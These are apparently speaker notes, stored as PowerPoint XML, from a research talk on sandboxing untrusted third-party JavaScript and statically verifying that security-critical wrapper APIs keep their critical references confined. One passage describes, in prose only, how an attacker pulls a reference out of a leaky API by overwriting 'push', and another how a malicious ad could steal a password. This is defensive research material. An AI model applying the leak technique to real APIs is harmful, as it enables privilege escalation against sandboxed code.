          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>No support for setters and getters and a finally a restriction on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restriction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is that the call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>siue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> should explicitly list the free variables on the code being </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>evaled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So in the example, since the variable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is free, we must list it in the call site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The semantic restriction is that the code is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>evaled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> only if the set of free variables are contained in the list provided.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is useful during program analysis as it allows an upper bound  to be established on the side effects that happen during  the execution of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provide a write-only log facility to untrusted code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So we provide a push method on the API that allows untrusted code to push content on the log.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If untrusted code is sandboxed then this mechanism should work correctly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>As untrusted code cannot directly reach the log and the API only provides write-access.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> this reasoning we can also expose a store method that take an index and a value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>and stores the value at the particular index of the log.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This API however is leaky and here is  way to extract a reference  to the log out of it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The attacker calls the store method with the index as the string “push” and and a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Which steals the this value passed to it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>When the attacker then calls push, the attacker’s function gets called with the log as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The this value which then gets stolen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So manual code review is clearly insufficient for establishing correctness of APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And we need an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>autoamted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> technique to check for all possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>interleving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shown here, we provide untrusted code with an API with just one function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We want to verify that untrusted code cannot perform any action that can lead to a direct access to a critical resource.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Among the various actions, untrusted code can invoke it and then obtain a reference to some resource say r2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Then it can directly access it and obtain references to other reachable resources,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In this case r3 and r4. Then it can side-effect say r4 with one of its own objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>say u1. Now the semantics of the function f1 might have changed and so that attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>can get hold of new things by invoking it again and so on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If there are many such API methods then we have to examine all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>possible inter-leavings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>of the above actions for each of the API methods.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Precision – efficiency trade-off.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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We are not interested in solving the confinement problem for arbitrary APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We are only interested in security-critical wrapper APIs which are typically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0" smtClean="0"/>
              <a:t>part of the TCB, are small, disciplined and use code patterns that are easy to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0" smtClean="0"/>
              <a:t>reason about. This is because these APIs are typically subject to lot of manual code reviews.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Leveraging these properties, it seems like a conservative and scalable program analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0" smtClean="0"/>
              <a:t>can perform well on such API implementations and will also server the dual purpose of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0" smtClean="0"/>
              <a:t> keeping  a check on the developers if they deviate from writing disciplined and simple code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We are interested in security critical wrapper APIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These are small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in size relative to the application, written in a disciplined manner and using simple coding patterns.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In our tool we leverage this simplicity to have conservative and  scalable analysis that works well on disciplined APIs,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>You may think that the tool would end with a large number of False positive on APIs that are not disciplined which is </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Often the case in JS. However  like type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cheking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> this is an advantage as it acts as  a check on developers and prevents them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>From writing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>indisciplined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> code in security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>kerners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>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One way to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>emebed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> JavaScript is to use a script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– tag which means we simply take the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code and append it to the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Here are two ads directly embedded in the page. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>As I said before these scripts want to manipulate features of the page display fancy balls that bounce around on the screen etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>How does they do that ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>They do that by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>acessing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the document object model of the page, which is a programmatic interface to manipulating features of the page.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DOM  API provides methods for manipulating various elements of the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In particular it will provide access to all these form fields and so if the ad is malicious </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>it can steal the password and send it off to an evil location.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So untrusted third-party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poses a threat to critical hosting page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first step is to define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a predicate Confine that take a trusted API implementation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and a set of critical references.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The code that executes in the system is as follows. Here the untrusted code is allowed two free variables, </a:t>
            </a:r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” which holds the API object and “test” which is the challenge variable – untrusted code wins if it sets “test” to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>criticsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> reference.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is done to set up the problem. So confinement basically means that the points-to set of “test” during the entire execution trace never</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Contains a critical reference and this must hold for ALL untrusted programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Using this we can formally define the predicate Confine.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hurdle in statically verifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> this predicate is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>forall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> quantification and the analysis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Recall that our goal is to apply our analysis only to implementation of security critical APIs which</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Are disciplined and simple.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So we choose a conservative flow-insensitive and context-insensitive program analysis which means we are not sensitive to the order of the statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And we only allocate  single activation record for all calls to a function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We label each statement in the program and abstract heap locations by their creation site line number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Finally we analyze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conservatively only based on the free variable provided and thus mitigate overcome hurdles stated above</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>As the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>forall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> quantification goes 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analysis is expressed in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For each statement in the program we have a specific predicate in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for the little program here, the statement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= {} is encode as stack(y,l1) where</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>L1 is the label of the statement and abstract element for the object allocated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>x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is encoded as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>assign(x,y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>x.f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is encoded as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>store(x,f,y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Thus we have obtained an abstract representation of the program as a set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>logical facts expressed in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 semantics of the language is abstracted a set of horn clauses. For example if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Assign(x,y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) holds and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points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> on the stack then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point to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> on the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Thus by churning the facts with respect to the horn clauses we can derive all relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>That can be true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complete list of predicates is as shown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>These are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sufficent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to model all programs in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>SESlight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and all subtleties of the language semantics like implicit type conversions and reflection.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symbolic execution ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Symbolic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>exeution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is execution of the program with symbolic rather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> than actual data values. In order to do this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>we must have the transfer function or the meaning of each program statement as a symbolic expression.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Definiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> program transformation symbolically, how data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is being manipulated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Dom also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> provides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>acces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to other third-party components of the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>malcious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> ad here can use the DOM to obtain access to the other ad and then change its contents.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untrusted third-party JavaScript poses a threat to other third-party components on the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I will state the JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> sandboxing problem. Whenever I use the word sandboxing it is in the abstract sense </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>As a mechanism to restrict.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The problem is to design  a sandboxing mechanism for untrusted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in order to protect critical hosting page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>resourcres</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And also resources belonging to other third-party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two constraints here that I set for my self. No change to the browser because otherwise the solution would be difficult to deploy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And secondly the solution must have provable guarantees and hopefully by the end of this talk I will convince you why this second point is very important</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Especially when dealing with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way to solve this problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> mechanism that the browser provides. Here is how it works.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>First load the hosting page. Then create an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> which is basically a sub-window in the page. Then load third-party code into this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Iframe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browser guarantees that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>allJavascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> runs in a separate execution environment and is isolated from the hosting page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Since this is too restrictive and does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>notallow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for any communication the browser also provide a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> API that can be used for communicating string across frame.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>People have worked on this idea and developed rich abstractions on top of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> API that allow for useful and controlled interaction between frames.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Since the past two years browsers also provide a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>postmessage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idea is as follows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>As before load the hosting page first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Prefetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the third-party code at the hosting page server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Statically analyze and rewrite it and then bring this rewritten code on the  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>page. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The static analysis and rewriting should be such that the rewritten code only has restricted access to the hosting page. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This static analysis and rewriting is what we call language-based sandboxing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Now depending on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>securty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> policy that we wish to enforce on the interaction between third-party code and the hosting page, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>we will appropriately design the sandboxing mechanism.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approach is followed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FBJS, Yahoo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>AdSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Caja</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Now in order to design language-based sandboxing the first question is what security policies must be enforced.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In order to answer this question we manually analyzed the implementation of </a:t>
            </a:r>
